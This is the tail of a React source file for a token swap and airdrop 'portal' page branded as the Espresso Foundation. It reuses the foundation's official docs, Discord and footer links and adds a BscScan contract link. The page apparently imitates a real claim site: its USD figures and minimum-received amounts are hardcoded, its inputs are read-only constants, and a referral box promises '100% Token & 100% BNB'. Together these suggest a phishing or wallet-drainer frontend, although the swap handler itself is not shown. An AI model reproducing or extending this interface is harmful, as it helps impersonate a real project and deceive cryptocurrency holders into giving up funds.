                      <img src="/token.JPEG" alt="ESP" className="token-icon" />
                      <span className="token-name">ESP</span>
                      <IconChevronDown />
                   </div>
                   <div className="token-input-area">
                      <input className="token-amount-input" value={espInputVal} readOnly />
                      <div className="token-usd-value">≈$873,1</div>
                   </div>
                </div>
                <div className="swap-row-bottom">
                   <div className="wallet-info">
                      <span>Wallet {shortAddress}</span>
                      <span className="wallet-dot"></span>
                   </div>
                   <div className="add-funds">
                      <IconWallet /> 
                      {isEspLoading ? '...' : (espData ? formatEther(espData.value) : '0')} Add Funds
                   </div>
                </div>
             </div>

             <div className="swap-divider">
                <div className="swap-arrow-box">
                   <IconSwapArrow />
                </div>
             </div>

             {/* TO */}
             <div style={{display:'flex', justifyContent:'space-between', marginBottom:'6px', marginTop:'-10px'}}>
                <span className="swap-label">To</span>
             </div>

             <div className="swap-input-container">
                <div className="swap-main-row">
                   <div className="token-selector">
                      <img src="/bnb.png" alt="BNB" className="token-icon" />
                      <span className="token-name">BNB</span>
                      <IconChevronDown />
                   </div>
                   <div className="token-input-area">
                      <input className="token-amount-input" value={SWAP_BNB_INPUT} readOnly />
                      <div className="token-usd-value">≈$873,31 (+0.02%)</div>
                   </div>
                </div>
                <div className="swap-row-bottom">
                   <div className="wallet-info">
                      <span>Wallet {shortAddress}</span>
                      <span className="wallet-dot"></span>
                   </div>
                   <div style={{display:'flex', gap:'4px', alignItems:'center'}}>
                      <IconWallet /> 
                      <span>{isBnbLoading ? '...' : bnbFormatted}</span>
                   </div>
                </div>
             </div>

             <button 
               className="primary-btn animated-btn" 
               style={{marginTop:'20px', fontSize:'16px', letterSpacing:'1px'}}
               onClick={handleSwapAction}
             >
               SWAP
             </button>

             <div className="swap-details">
                <div className="detail-row">
                   <span>Route</span>
                   <span className="detail-val">
                      <span className="route-badge"><span style={{color:'cyan'}}>●</span> LiquidMesh</span> 
                      <span className="green-badge">Recommend</span> ›
                   </span>
                </div>
                <div className="detail-row">
                   <span>Rate</span>
                   <span className="detail-val">1 ESP ≈ 0,00013039 BNB ⇆</span>
                </div>
                <div className="detail-row">
                   <span>Slippage</span>
                   <span className="detail-val">Auto | 2.628% <span className="green-badge">Anti-MEV</span> ›</span>
                </div>
                <div className="detail-row">
                   <span>Min. Received</span>
                   <span className="detail-val">1,35327 BNB</span>
                </div>
                <div className="detail-row">
                   <span>Service Fee <span style={{color:'orange'}}>●</span></span>
                   <span className="detail-val">0.5%</span>
                </div>
             </div>
          </div>

          {/* --- REFERRAL BOX --- */}
          <div className="referral-card">
             <div className="earn-section">
                <div className="earn-title">Referral Reward</div>
                <div className="earn-value">Earn 100% Token & 100% BNB</div>
             </div>

             <div className="ref-row">
                <span className="ref-label">Token Contract</span>
                <div className="ref-value-container">
                   <a 
                     href={`https://bscscan.com/token/0xfD32aD4b1f3495F54E6CcDA0b0B943b14F008616`} 
                     target="_blank" 
                     rel="noopener noreferrer"
                     style={{color:'#d4a066', textDecoration:'none', fontSize:'13px', display:'flex', alignItems:'center', gap:'4px'}}
                   >
                     View on BscScan <IconExternal />
                   </a>
                </div>
             </div>

             <div className="ref-row" style={{marginTop:'12px'}}>
                <span className="ref-label">Referral Link</span>
                <div className="ref-value-container">
                   <div className="ref-link-box">
                      {address ? `${window.location.origin}?ref=${shortAddress}` : 'Connect Wallet'}
                   </div>
                   <button 
                     onClick={handleCopyRef}
                     style={{
                        background:'rgba(255,255,255,0.1)', border:'none', color:'white',
                        width:'32px', height:'32px', borderRadius:'8px', cursor:'pointer',
                        display:'flex', alignItems:'center', justifyContent:'center'
                     }}
                   >
                      {isCopied ? '✓' : <IconCopy />}
                   </button>
                </div>
             </div>
          </div>

          <div className="back-btn-area">
             <button onClick={() => setPage('claim')} className="back-btn">
               &larr; Back to Portal
             </button>
          </div>
        </>
      )}

      {/* --- HELP & FOOTER --- */}
      <div className="help-box">
        <div className="help-header">
          <IconHelpBook />
          <span>Need Help?</span>
        </div>
        <div className="help-content">
          <div className="help-item">
            <span>FAQ</span>
            <IconArrowRight />
          </div>
          <a href="https://docs.espressosys.com/network/references/delegation-ui" target="_blank" rel="noopener noreferrer" className="help-item">
            <span>ESP Staking Guide</span>
            <IconExternal />
          </a>
          <a href="https://docs.espressosys.com" target="_blank" rel="noopener noreferrer" className="help-item">
            <span>Espresso Docs</span>
            <IconExternal />
          </a>
          <div className="help-item-last">
            <a href="https://discord.com/invite/YHZPk5dbcq" target="_blank" rel="noopener noreferrer" className="help-link-row">
              <span>Submit a support request</span>
              <IconExternal />
            </a>
            <div className="help-caption">
              Support requests are handled in our Discord. Open a support ticket in the #airdrop-support channel.
            </div>
          </div>
        </div>
      </div>

      <footer className="footer-final">
        <div className="footer-divider"></div>
        <div className="footer-content">
          <div className="footer-row copyright">
            © 2026 Espresso Foundation
          </div>
          <div className="footer-row middle-row">
             <a href="/terms-of-service" className="footer-link">Terms Of Service</a>
             <span className="footer-v-sep">|</span>
             <a href="https://www.magna.so/privacy-policy" target="_blank" rel="noopener noreferrer" className="footer-link">Privacy Policy</a>
             <span className="footer-v-sep">|</span>
             <div className="footer-social-icons">
                <a href="https://x.com/espressoFNDN" target="_blank" rel="noopener noreferrer"><IconX /></a>
                <a href="https://discord.com/invite/YHZPk5dbcq" target="_blank" rel="noopener noreferrer"><IconDiscordFooter /></a>
                <a href="https://paragraph.com/@espressofndn" target="_blank" rel="noopener noreferrer"><IconParagraph /></a>
             </div>
          </div>
          <div className="footer-row powered">
             <span>powered by</span>
             <a href="https://magna.so/?utm_source=espresso-portal&utm_medium=referral&utm_campaign=portal_navigation&utm_content=logo" target="_blank" rel="noopener noreferrer" style={{color:'inherit', display:'flex'}}>
                <IconMagna />
             </a>
          </div>
        </div>
      </footer>
    </div>
  );
}

export default App;